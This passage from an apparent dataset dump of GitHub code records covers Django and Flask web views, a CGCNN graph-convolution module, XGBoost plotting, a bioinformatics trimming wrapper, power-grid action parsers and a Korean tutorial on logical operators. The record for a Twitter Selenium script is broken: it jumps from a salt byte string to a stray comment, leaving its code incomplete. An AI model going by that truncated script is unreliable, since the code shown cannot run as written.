recomendarHistorialApi(request,historial):\n if request.method=='GET':\n x = historial.split(',')\n y = []\n for i in x:\n recommendation = recommend(i)\n for j in recommendation:\n y.append(j)\n\n response = np.array(y, dtype=np.int32)\n return JsonResponse({\"recomend\": response.tolist()},safe=False)","repo_name":"Emerdinger/api-django","sub_path":"RecomendApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23805695787","text":"from flask import render_template,request,redirect,url_for,abort,flash\nfrom . import main\nfrom flask_login import login_required,current_user\nfrom ..models import User,Pitch,Comment\nfrom .forms import UpdateProfile,PitchForm,CommentForm\nfrom .. import db,photos\n# import markdown2\n\n# Views\n@main.route('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n title = 'Pitch Application'\n pitch = Pitch.query.all()\n # categories = Category.get_categories()\n return render_template('index.html',title = title, Pitch = pitch)\n\n@main.route('/pitch/new', methods=['GET','POST'])\n@login_required\ndef new_pitch():\n form=PitchForm()\n if form.validate_on_submit():\n pitches=Pitch(category=form.category.data,pitch_content=form.content.data)\n db.session.add(pitches)\n db.session.commit()\n\n flash('pitch created')\n\n pitches=Pitch.query.all()\n return render_template('pitch.html',form=form, pitch=pitches)\n\n\n@main.route('/category/')\ndef category(id):\n\n category = PitchCategory.query.get(id)\n category_name = PitchCategory.query.get(category_name)\n\n if category is None:\n abort(404)\n\n pitch_in_category = Pitch.get_pitch(id)\n return render_template('category.html' ,category= category, pitch= pitch_in_category)\n\n\n@main.route('/pitch/comments/new/',methods = ['GET','POST'])\n@login_required\ndef new_comment(id):\n form = CommentForm()\n if form.validate_on_submit():\n new_comment = Comment(pitch_id =id,data=form.comment.data)\n new_comment.save_comment()\n return redirect(url_for('main.new_pitch'))\n return render_template('ncomment.html', form=form)\n\n@main.route('/comments/')\ndef single_comment(id):\n comment=Comment.query.get(id)\n if comment is None:\n abort(404)\n return render_template('new_comment.html')\n\n@main.route('/view/comment/')\ndef view_comments(id):\n '''\n Function that shows the comments of a particular pitch\n '''\n comments = Comment.get_comments(id)\n \n return render_template('viewcomment.html',comments = comments, id=id)\n\n@main.route('/user/')\ndef profile(uname):\n user = User.query.filter_by(username = uname).first()\n\n if user is None:\n abort(404)\n\n return render_template(\"profile/profile.html\",user = user)\n\n@main.route('/user//update',methods = ['GET','POST'])\n@login_required\ndef update_profile(uname):\n user = User.query.filter_by(username = uname).first()\n if user is None:\n abort(404)\n\n form = UpdateProfile()\n\n if form.validate_on_submit():\n user.bio = form.bio.data\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('.profile',uname=user.username))\n\n return render_template('profile/update.html',form =form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.commit()\n return redirect(url_for('main.profile',uname=uname))","repo_name":"edithamadi/pitch_one","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"576660781","text":"# MOFTransformer version 2.0.0\r\nimport random\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n \"\"\"\r\n Convolutional operation on graphs\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(self, atom_fea_len, nbr_fea_len):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.fc_full = nn.Linear(\r\n 2 * self.atom_fea_len + self.nbr_fea_len, 2 * self.atom_fea_len\r\n )\r\n self.sigmoid = nn.Sigmoid()\r\n self.softplus1 = nn.Softplus()\r\n self.bn1 = nn.BatchNorm1d(2 * self.atom_fea_len)\r\n self.bn2 = nn.BatchNorm1d(self.atom_fea_len)\r\n self.softplus2 = nn.Softplus()\r\n\r\n def forward(self, atom_in_fea, nbr_fea, nbr_fea_idx):\r\n \"\"\"\r\n Forward pass\r\n\r\n N: Total number of atoms in the batch\r\n M: Max number of neighbors\r\n\r\n Args:\r\n atom_in_fea: Variable(torch.Tensor) shape (N, atom_fea_len)\r\n Atom hidden features before convolution\r\n nbr_fea: Variable(torch.Tensor) shape (N, M, nbr_fea_len)\r\n Bond features of each atom's M neighbors\r\n nbr_fea_idx: torch.LongTensor shape (N, M)\r\n Indices of M neighbors of each atom\r\n\r\n Returns:\r\n\r\n atom_out_fea: nn.Variable shape (N, atom_fea_len)\r\n Atom hidden features after convolution\r\n\r\n \"\"\"\r\n\r\n N, M = nbr_fea_idx.shape\r\n # convolution\r\n atom_nbr_fea = atom_in_fea[nbr_fea_idx, :] # [N, M, atom_fea_len]\r\n\r\n total_nbr_fea = torch.cat(\r\n [\r\n atom_in_fea.unsqueeze(1).expand(N, M, self.atom_fea_len),\r\n # [N, atom_fea_len] -> [N, M, atom_fea_len] -> v_i\r\n atom_nbr_fea, # [N, M, atom_fea_len] -> v_j\r\n nbr_fea,\r\n ], # [N, M, nbr_fea_len] -> u(i,j)_k\r\n dim=2,\r\n )\r\n # [N, M, atom_fea_len*2+nrb_fea_len]\r\n\r\n total_gated_fea = self.fc_full(total_nbr_fea) # [N, M, atom_fea_len*2]\r\n total_gated_fea = self.bn1(\r\n total_gated_fea.view(-1, self.atom_fea_len * 2)\r\n ).view(\r\n N, M, self.atom_fea_len * 2\r\n ) # [N, M, atom_fea_len*2]\r\n nbr_filter, nbr_core = total_gated_fea.chunk(2, dim=2) # [N, M, atom_fea_len]\r\n nbr_filter = self.sigmoid(nbr_filter)\r\n nbr_core = self.softplus1(nbr_core)\r\n nbr_sumed = torch.sum(nbr_filter * nbr_core, dim=1) # [N, atom_fea_len]\r\n nbr_sumed = self.bn2(nbr_sumed)\r\n out = self.softplus2(atom_in_fea + nbr_sumed) # [N, atom_fea_len]\r\n return out\r\n\r\n\r\nclass GraphEmbeddings(nn.Module):\r\n \"\"\"\r\n Generate Embedding layers made by only convolution layers of CGCNN (not pooling)\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(\r\n self, atom_fea_len, nbr_fea_len, max_graph_len, hid_dim, n_conv=3, vis=False\r\n ):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.max_graph_len = max_graph_len\r\n self.hid_dim = hid_dim\r\n self.embedding = nn.Embedding(119, atom_fea_len) # 119 -> max(atomic number)\r\n self.convs = nn.ModuleList(\r\n [\r\n ConvLayer(atom_fea_len=atom_fea_len, nbr_fea_len=nbr_fea_len)\r\n for _ in range(n_conv)\r\n ]\r\n )\r\n self.fc = nn.Linear(atom_fea_len, hid_dim)\r\n\r\n self.vis = vis\r\n\r\n def forward(\r\n self, atom_num, nbr_idx, nbr_fea, crystal_atom_idx, uni_idx, uni_count, moc=None\r\n ):\r\n \"\"\"\r\n Args:\r\n atom_num (tensor): [N', atom_fea_len]\r\n nbr_idx (tensor): [N', M]\r\n nbr_fea (tensor): [N', M, nbr_fea_len]\r\n crystal_atom_idx (list): [B]\r\n uni_idx (list) : [B]\r\n uni_count (list) : [B]\r\n Returns:\r\n new_atom_fea (tensor): [B, max_graph_len, hid_dim]\r\n mask (tensor): [B, max_graph_len]\r\n \"\"\"\r\n assert self.nbr_fea_len == nbr_fea.shape[-1]\r\n\r\n atom_fea = self.embedding(atom_num) # [N', atom_fea_len]\r\n for conv in self.convs:\r\n atom_fea = conv(atom_fea, nbr_fea, nbr_idx) # [N', atom_fea_len]\r\n atom_fea = self.fc(atom_fea) # [N', hid_dim]\r\n\r\n new_atom_fea, mask, mo_label = self.reconstruct_batch(\r\n atom_fea, crystal_atom_idx, uni_idx, uni_count, moc\r\n )\r\n # [B, max_graph_len, hid_dim], [B, max_graph_len]\r\n return new_atom_fea, mask, mo_label # None will be replaced with MOC\r\n\r\n def reconstruct_batch(self, atom_fea, crystal_atom_idx, uni_idx, uni_count, moc):\r\n batch_size = len(crystal_atom_idx)\r\n\r\n new_atom_fea = torch.full(\r\n size=[batch_size, self.max_graph_len, self.hid_dim], fill_value=0.0\r\n ).to(atom_fea)\r\n\r\n mo_label = torch.full(\r\n size=[batch_size, self.max_graph_len], fill_value=-100.0\r\n ).to(atom_fea)\r\n\r\n for bi, c_atom_idx in enumerate(crystal_atom_idx):\r\n # set uni_idx with (descending count or random) and cut max_graph_len\r\n idx_ = torch.LongTensor([random.choice(u) for u in uni_idx[bi]])[\r\n : self.max_graph_len\r\n ]\r\n rand_idx = idx_[torch.randperm(len(idx_))]\r\n if self.vis:\r\n rand_idx = idx_\r\n new_atom_fea[bi][: len(rand_idx)] = atom_fea[c_atom_idx][rand_idx]\r\n\r\n if moc:\r\n mo = torch.zeros(len(c_atom_idx))\r\n metal_idx = moc[bi]\r\n mo[metal_idx] = 1\r\n mo_label[bi][: len(rand_idx)] = mo[rand_idx]\r\n\r\n mask = (new_atom_fea.sum(dim=-1) != 0).float()\r\n\r\n return new_atom_fea, mask, mo_label\r\n","repo_name":"hspark1212/MOFTransformer","sub_path":"moftransformer/modules/cgcnn.py","file_name":"cgcnn.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"16"}
+{"seq_id":"28896004403","text":"def solution(s, e, sum1):\n global flag, K\n\n if flag == 1:\n return\n if sum1 > K:\n return\n if sum1 == K:\n flag = 1\n return\n if s == e:\n return\n\n solution(s+1, e, sum1)\n solution(s+1, e, sum1+data[s])\n\n\nT = int(input())\nfor i in range(T):\n N, K = map(int, input().split())\n data = list(map(int, input().split()))\n flag = 0\n solution(0, N, 0)\n if flag == 1:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\n","repo_name":"jho0078/til","sub_path":"algorithm/D24_2019_03_28(AD)/더하기.py","file_name":"더하기.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"307703819","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nfrom msedge.selenium_tools import Edge, EdgeOptions\nfrom selenium.webdriver.common.keys import Keys\nfrom werkzeug.wrappers import response\nfrom data import Twitter\nfrom scripts import tweeting\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Protocol.KDF import PBKDF2\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nimport time\n\n#login data\n# username = Twitter['username']\n# password = Twitter['password']\n\n# salt storing\nsalt = b'\\xec\\x86\\xc6\\xcao?3`.\\xe8\\x86\\x0b\\xcd?I\\x8dV\\x808c\\x94\\x03\\x95~\\xf3\\xb7 problem is the instienace\n# functional programming =>","repo_name":"OsamaElsherif/socialmedia","sub_path":"webApplication/twiiter.py","file_name":"twiiter.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28924195510","text":"#!/usr/bin/env python\n\n\"\"\"\nStart the process and dump the documentation to the doc dir\n\"\"\"\n\nimport socket, subprocess, time,os\n\nenv = os.environ\nenv['L1FWD_BTS_HOST'] = '127.0.0.1'\n\nbts_proc = subprocess.Popen([\"./src/osmo-bts-sysmo/sysmobts-remote\",\n\t\t\"-c\", \"./doc/examples/sysmo/osmo-bts-sysmo.cfg\"], env = env,\n\t\tstdin=None, stdout=None)\ntime.sleep(1)\n\ntry:\n\tsck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsck.setblocking(1)\n\tsck.connect((\"localhost\", 4241))\n\tsck.recv(4096)\n\n\t# Now send the command\n\tsck.send(\"show online-help\\r\")\n\txml = \"\"\n\twhile True:\n\t\tdata = sck.recv(4096)\n\t\txml = \"%s%s\" % (xml, data)\n\t\tif data.endswith('\\r\\nOsmoBTS> '):\n\t\t\tbreak\n\n\t# Now write everything until the end to the file\n\tout = open('doc/vty_reference.xml', 'w')\n\tout.write(xml[18:-11])\n\tout.close()\nfinally:\n\t# Clean-up\n\tbts_proc.kill()\n\tbts_proc.wait()\n\n","repo_name":"osmocom/osmo-bts","sub_path":"contrib/dump_docs.py","file_name":"dump_docs.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"}
+{"seq_id":"73390894408","text":"from django.contrib import admin\r\nfrom .models import Product, Order, OrderItem\r\n\r\n\r\nclass ProductAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product_name', 'stock')\r\n ordering = ('-stock',)\r\n\r\n\r\nclass OrderAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('source', 'order_id')\r\n\r\n\r\nclass OrderItemAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product',)\r\n\r\n\r\n# Register your models here.\r\nadmin.site.register(Product, ProductAdmin)\r\nadmin.site.register(Order, OrderAdmin)\r\nadmin.site.register(OrderItem, OrderItemAdmin)\r\n","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"simpleapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"14014173799","text":"import os, time, json, argparse\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom EventIDs import IDs\nfrom Plot_maker import low_stat_Z\n\nprint(xgb.__version__)\n\nt0 = time.time()\nstart = time.asctime(time.localtime())\nprint('Started', start)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--met_reg', type=str, default=\"50-100\", help=\"MET signal region\")\nparser.add_argument('--dm_model', type=str, default=\"DH_HDS\", help=\"Dataset to test\")\nparser.add_argument('--channel', type=str, default=\"ee\", help=\"Lepton channel to test\")\nargs = parser.parse_args()\n\nmet_reg = args.met_reg\ndm_model = args.dm_model\nchannel = args.channel \n\n\n\nN = 9\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\"color\", plt.cm.PuRd_r(np.linspace(0.1,0.95,N)))\n\ndef Z_score_array(sig_pred, bkg_pred):\n np.seterr(divide='ignore', invalid='ignore') # Remove true divide message\n return [low_stat_Z(sum(sig_pred[25:]), sum(bkg_pred[25:])), \n low_stat_Z(sum(sig_pred[30:]), sum(bkg_pred[30:])), \n low_stat_Z(sum(sig_pred[35:]), sum(bkg_pred[35:])),\n low_stat_Z(sum(sig_pred[40:]), sum(bkg_pred[40:])), \n low_stat_Z(sum(sig_pred[45:]), sum(bkg_pred[45:])), \n low_stat_Z(sig_pred[-1], bkg_pred[-1])]\n\nnp_dir = '/storage/racarcam/Data/XGB_frfr/'+met_reg+'/'+dm_model+'/'\n\nsig_mzp_130 = np.load(np_dir+'mZp_130/sig_pred_'+channel+'.npy')\nsig_mzp_200 = np.load(np_dir+'mZp_200/sig_pred_'+channel+'.npy')\nsig_mzp_400 = np.load(np_dir+'mZp_400/sig_pred_'+channel+'.npy')\nsig_mzp_600 = np.load(np_dir+'mZp_600/sig_pred_'+channel+'.npy')\n\nbkg_mzp_130 = np.load(np_dir+'mZp_130/bkg_pred_'+channel+'.npy')\nbkg_mzp_200 = np.load(np_dir+'mZp_200/bkg_pred_'+channel+'.npy')\nbkg_mzp_400 = np.load(np_dir+'mZp_400/bkg_pred_'+channel+'.npy')\nbkg_mzp_600 = np.load(np_dir+'mZp_600/bkg_pred_'+channel+'.npy')\n\nmodel_dsids = []\njson_file = open('DM_DICT_Zp_dsid.json')\nDM_file = json.load(json_file)\nfor key in DM_file.keys():\n word = key.split('_')\n model_sec = word[0]+'_'+word[1]\n if model_sec == dm_model.lower():\n model_dsids.append(DM_file[key])\n\njson_file2 = open('DM_DICT.json')\nmodel_names = json.load(json_file2)\nsave_as = 'mZp_'+model_names[model_dsids[0][0]].split(' ')[-2]+'/'\n\nplot_dir = '../../Plots/XGBoost/Model_independent_frfr/'+met_reg+'/'+dm_model+'/'\n\nplt.figure(figsize=(11,8))\nX_axis = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99]\nY_axis_130 = Z_score_array(sig_mzp_130, bkg_mzp_130)\nY_axis_200 = Z_score_array(sig_mzp_200, bkg_mzp_200)\nY_axis_400 = Z_score_array(sig_mzp_400, bkg_mzp_400)\nY_axis_600 = Z_score_array(sig_mzp_600, bkg_mzp_600)\n\nplt.figure(figsize=[10,6])\nplt.plot(X_axis, Y_axis_130, linestyle='--')\nplt.scatter(X_axis, Y_axis_130, label = \"$m_{Z'}$ 130 GeV\")\nplt.plot(X_axis, Y_axis_200, linestyle='--')\nplt.scatter(X_axis, Y_axis_200, label = \"$m_{Z'}$ 200 GeV\")\nplt.plot(X_axis, Y_axis_400, linestyle='--')\nplt.scatter(X_axis, Y_axis_400, label = \"$m_{Z'}$ 400 GeV\")\nplt.plot(X_axis, Y_axis_600, linestyle='--')\nplt.scatter(X_axis, Y_axis_600, label = \"$m_{Z'}$ 600 GeV\")\nplt.xlim([0,1])\nplt.ylim([np.nanmin(Y_axis_600)*0.9, np.nanmax(Y_axis_130)*1.1])\nplt.yscale('log')\nplt.grid(True)\nplt.legend()\nplt.ylabel('Expected significance [$\\sigma$]')\nif met_reg =='50-100':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR1\")\nelif met_reg =='100-150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR2\")\nelif met_reg =='150':\n plt.title(\"Significance on \"+dm_model.split('_')[0]+' '+dm_model.split('_')[1]+\" \"+channel+\", trained network on SR3\")\nplt.xlabel('XGBoost output')\nplt.savefig(plot_dir+'EXP_SIG_'+channel+'.pdf')\n\n","repo_name":"rubenguevara/Master-Thesis","sub_path":"ML/XGBoost/FULL_model_independent_testing_plot_sig.py","file_name":"FULL_model_independent_testing_plot_sig.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"27637485119","text":"import os\nimport sys\n\n\ndef pairedEnd(R1, R2):\n print(sys.path)\n try:\n os.popen(\" \".join(\n ['trimmomatic PE -phred33 ',\n R1,\n R2,\n R1+'.paired',\n R1+'.unpaired',\n R2+'.paired',\n R2+'.unpaired',\n 'LEADING:3',\n 'TRAILING:3',\n 'SLIDINGWINDOW:4:15',\n 'MINLEN:36'\n ])).read()\n return True\n except:\n return False\n","repo_name":"gaarangoa/deeparg","sub_path":"deeparg/short_reads_pipeline/tools/trimmomaticClass.py","file_name":"trimmomaticClass.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"17394387354","text":"import json\nimport os\nimport numpy as np\n\nfrom grid2op.Parameters import Parameters\nfrom oracle4grid.core.utils.config_ini_utils import MAX_ITER\n\nfrom oracle4grid.core.utils.constants import EnvConstants\nfrom oracle4grid.core.utils.prepare_environment import prepare_env\n#from oracle4grid.core.oracle import oracle\n\nASSET_MAPPING = {\"line (origin)\":\"lines_id_bus\",\n \"line (extremity)\":\"lines_id_bus\",\n \"generator\":\"gens_id_bus\",\n \"load\":\"loads_id_bus\"}\n\n#def load_and_run(env_dir, chronic, action_file, debug,agent_seed,env_seed, config, constants=EnvConstants()):\n# atomic_actions, env, debug_directory, chronic_id = load(env_dir, chronic, action_file, debug, constants=constants, config = config)\n# # Parse atomic_actions format\n# # atomic_actions = parse(atomic_actions,env)\n# parser = OracleParser(atomic_actions, env.action_space)\n# atomic_actions = parser.parse()\n#\n# # Run all steps\n# return oracle(atomic_actions, env, debug, config, debug_directory=debug_directory,agent_seed=agent_seed,env_seed=env_seed,\n# grid_path=env_dir, chronic_scenario=chronic, constants=constants)\n\n\ndef load(env_dir, chronic, action_file, debug, constants=EnvConstants(), config = None, opponent_allowed=True):\n param = Parameters()\n param.init_from_dict(constants.DICT_GAME_PARAMETERS_SIMULATION)\n env, chronic_id = prepare_env(env_dir, chronic, param, opponent_allowed=opponent_allowed)\n\n # Load unitary actions\n with open(action_file) as f:\n atomic_actions = json.load(f)\n\n # Init debug mode if necessary\n if debug:\n try:\n output_path = config[\"output_path\"]\n except:\n output_path = \"oracle4grid/output\" # os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../..\",'output')\n debug_directory = init_debug_directory(env_dir, action_file, chronic, output_path)\n else:\n debug_directory = None\n return atomic_actions, env, debug_directory, chronic_id\n\n\ndef init_debug_directory(env_dir, action_file, chronic, output_path = None):\n\n action_file_os = os.path.split(action_file)[len(os.path.split(action_file)) - 1].replace(\".json\", \"\")\n grid_file_os = os.path.split(env_dir)[len(os.path.split(env_dir)) - 1]\n scenario = \"scenario_\" + str(chronic)\n debug_directory = os.path.join(output_path, grid_file_os, scenario, action_file_os)\n os.makedirs(debug_directory, exist_ok=True)\n replay_debug_directory = os.path.join(debug_directory, \"replay_logs\")\n os.makedirs(replay_debug_directory, exist_ok=True)\n return debug_directory\n\nclass OracleParser():\n def __init__(self, d, action_space):\n self.d = d\n self.action_space = action_space\n self.parse = self.choose_parser_function()\n\n def choose_parser_function(self):\n if type(self.d) is list:\n if 'set_bus' in list(self.d[0].keys()):\n if 'substations_id' in list(self.d[0]['set_bus'].keys()):\n # Format 1 detected\n print(\"Specific format is detected for actions: converting with parser 1\")\n return self.parser1\n if type(self.d) is dict:\n if 'sub' in list(self.d.keys()) or 'line' in list(self.d.keys()):\n first_key = list(self.d.keys())[0]\n first_sub_or_line_id = list(self.d[first_key].keys())[0]\n if first_sub_or_line_id.isnumeric():\n if type(self.d[first_key][first_sub_or_line_id]) is list:\n first_action = self.d[first_key][first_sub_or_line_id][0]\n specific_key = list(first_action.keys())[0]\n if specific_key == \"set_configuration\":\n # Format 2 detected\n print(\"Specific format is detected for actions: converting with parser 2\")\n return self.parser2\n elif specific_key in list(ASSET_MAPPING.values()) or specific_key == \"set_line\":\n # Natural Oracle Format\n print(\"Natural Oracle format is detected for actions\")\n return self.parser0\n else:\n raise ValueError(\"json action dict is in an unknown format - action key \"+str(specific_key)+\" not handled\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n else:\n raise ValueError(\"json action dict is in an unknown format\")\n\n def parser0(self):\n return self.d\n\n def parser1(self):\n subs = set()\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n sub = sub_action[0]\n subs.add(sub)\n\n # init new dict with subs\n new_d = {'sub': {sub: [] for sub in subs}}\n\n # Pas bonne idée, parcourir dans la boucle\n grid = self.action_space.cls_to_dict()\n\n for action in self.d:\n for sub_action in action['set_bus']['substations_id']:\n subid = sub_action[0]\n sub_topo = sub_action[1]\n\n # On cherche les ids des gens, loads et lines_ex/or modifiées par l'action sub_topo (qui donne le nouveau bus)\n # Generators\n gen_ids = [id_ for id_, subid_ in enumerate(grid['gen_to_subid']) if\n subid_ == subid] # id des générateurs concernés par cette substation\n new_action_on_gens = {\"gens_id_bus\":\n [[id_, sub_topo[grid['gen_to_sub_pos'][id_]]] for id_ in gen_ids]\n # Couples id du générateur, nouveau bus donné par sub_topo\n }\n # Loads\n load_ids = [id_ for id_, subid_ in enumerate(grid['load_to_subid']) if\n subid_ == subid]\n new_action_on_loads = {\"loads_id_bus\":\n [[id_, sub_topo[grid['load_to_sub_pos'][id_]]] for id_ in load_ids]\n }\n # Lines origins and extremities gathered\n line_or_ids = [id_ for id_, subid_ in enumerate(grid['line_or_to_subid']) if\n subid_ == subid]\n line_ex_ids = [id_ for id_, subid_ in enumerate(grid['line_ex_to_subid']) if\n subid_ == subid]\n new_action_on_lines = {\"lines_id_bus\":\n [[id_, sub_topo[grid['line_or_to_sub_pos'][id_]]] for id_ in line_or_ids] + [\n [id_, sub_topo[grid['line_ex_to_sub_pos'][id_]]] for id_ in line_ex_ids]\n }\n new_action = {**new_action_on_loads, **new_action_on_gens, **new_action_on_lines}\n new_d['sub'][subid].append(new_action)\n # TODO: lines\n return new_d\n\n def parser2(self):\n new_dict = {line_or_sub:\n {id_: [] for id_ in self.d[line_or_sub]}\n for line_or_sub in self.d.keys()}\n for line_or_sub in self.d:\n for id_ in self.d[line_or_sub]:\n for original_action in self.d[line_or_sub][id_]:\n action = np.array(original_action['set_configuration'])\n asset_types, asset_ids, asset_actions = find_and_check_action_on_assets(action, self.action_space,\n line_or_sub, int(id_))\n unitary_action_dict = get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub)\n target_l = new_dict[line_or_sub][id_].copy()\n target_l.append(unitary_action_dict)\n new_dict[line_or_sub][id_] = target_l\n return new_dict\n\ndef find_and_check_action_on_assets(action, action_space, line_or_sub, id_):\n impact = action_space.from_vect(action).impact_on_objects()\n\n # Initialize list of results\n asset_types = []\n asset_ids = []\n asset_actions = []\n\n # In case the action is on sub, check it is the case and on the right sub\n # Then, extract infos on assets impacted\n if line_or_sub == 'sub':\n bus_impact = impact['topology']['assigned_bus']\n if len(bus_impact) == 0:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" doesnt impact substation bus\")\n else:\n for sub_action in bus_impact:\n if sub_action['substation'] != id_:\n raise ValueError(\"Declared sub action on sub number\"+str(id_)+\" impacts an other substation (sub number \"+str(sub_action['substation'])+\")\")\n else:\n asset_actions.append(int(sub_action['bus']))\n asset_ids.append(int(sub_action['object_id']))\n asset_types.append(ASSET_MAPPING[sub_action['object_type']])\n\n # In case it is line disconnection, just check it impacts the right line\n elif line_or_sub == \"line\":\n line_impact = impact['force_line']['disconnections']['powerlines']\n if len(line_impact) == 0:\n raise ValueError(\"Declared line action on line number\"+str(id_)+\" doesnt disconnect any line\")\n else:\n for line_id_disc in line_impact:\n if line_id_disc != id_:\n raise ValueError(\"Declared line disconnection on line number\"+str(id_)+\" impacts an other line (sub number \"+str(line_id_disc)+\")\")\n\n return asset_types, asset_ids, asset_actions\n\n\ndef get_unitary_action_dict(asset_types, asset_ids, asset_actions, line_or_sub):\n if line_or_sub == \"sub\":\n d = dict()\n for asset_type, asset_id, asset_action in zip(asset_types, asset_ids, asset_actions):\n if asset_type in list(d.keys()):\n # update new sub action on this asset type\n action_on_asset = d[asset_type].copy()\n action_on_asset.append([asset_id, asset_action])\n d[asset_type] = action_on_asset\n else:\n # First action on this asset type\n d[asset_type] = [[asset_id, asset_action]]\n elif line_or_sub == \"line\":\n d = {\"set_line\":-1}\n return d\n","repo_name":"marota/Oracle4Grid","sub_path":"oracle4grid/core/utils/launch_utils.py","file_name":"launch_utils.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"40976302130","text":"\n'''\n* 논리 연산자 (&, |, and, or, not)\n\n# &, and: 좌항과 우항의 논리값이 모두 True일 경우에만 전체 결과 True 도출\n'''\na = 5\n\nif a > 1 and a < 10:\n print('asms 1~10 사이의 숫자가 아닙니다.')\nelse:\n print('a는 1~10 사이의 숫자가 아닙니다.')\n\n# 파이썬은 위의 식을 연결해서 작성 가능\nif 1 < a < 10:\n print('ok!')\n\n'''\n|, or: 좌항과 우항의 논리값이 한 쪽만 True여도 전체 결과 True 도출\n'''\n\n'''\n* 단축 평가 여산 (short circuit: and, or)\n- 좌항에서 전체 결과가 판명났을 경우 우항 연산을 진행하지 않는 연산자\n'''\n\nc = 0\n\nif(c == 0) or (10 / c == 5): # 우항에서 100% 에러가 나는 상황\n print('에러 없이 통과')\n\n# not 여산자는 논리값을 반전시킴\n\n'''\n- c언어에서는 정수 0을 False로 해석하고, \n0이 아닌 모든 정수를 True로 해석 (논리형 없음)\n파이썬에서도 C의 논리해석 그대로 적용 가능\n'''\n\napple = 5\nif not apple:\n print('사과가 하나도 없습니다.')\nelse:\n print('사과가', apple, '개 있습니다.')\n\n'''\n* 코딩도장 연습문제\n국어, 영어, 수학, 과학 점수가 있을 때 한 과목이라도 50점 미만이면 불합격,\n 다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요.\n'''\nkorean = 92\nenglish = 47\nmathematics = 86\nscience = 81\n\nif korean >= 50 and english >= 50 and mathematics >= 50 and science >= 50:\n print('합격')\nelse:\n print('불합격') \n\n'''\n* 코딩도장 퀴즈\n표준 입력으로 국어, 영어, 수학, 과학 점수가 입력됩니다. 국어는 90점 이상, \n영어는 80점 초과, 수학은 85점 초과, 과학은 80점 이상일 때 합격이라고 정했습니다\n(한 과목이라도 조건에 만족하지 않으면 불합격). \n다음 소스 코드를 완성하여 합격이면 True, 불합격이면 False가 출력되게 만드세요\n'''\nkor, eng, math, sc = map(int, input().split())\nprint( kor >= 90 and eng > 80 and math > 85 and sc >= 80)\n","repo_name":"suyeon0610/python","sub_path":"Basic/logical_operator.py","file_name":"logical_operator.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
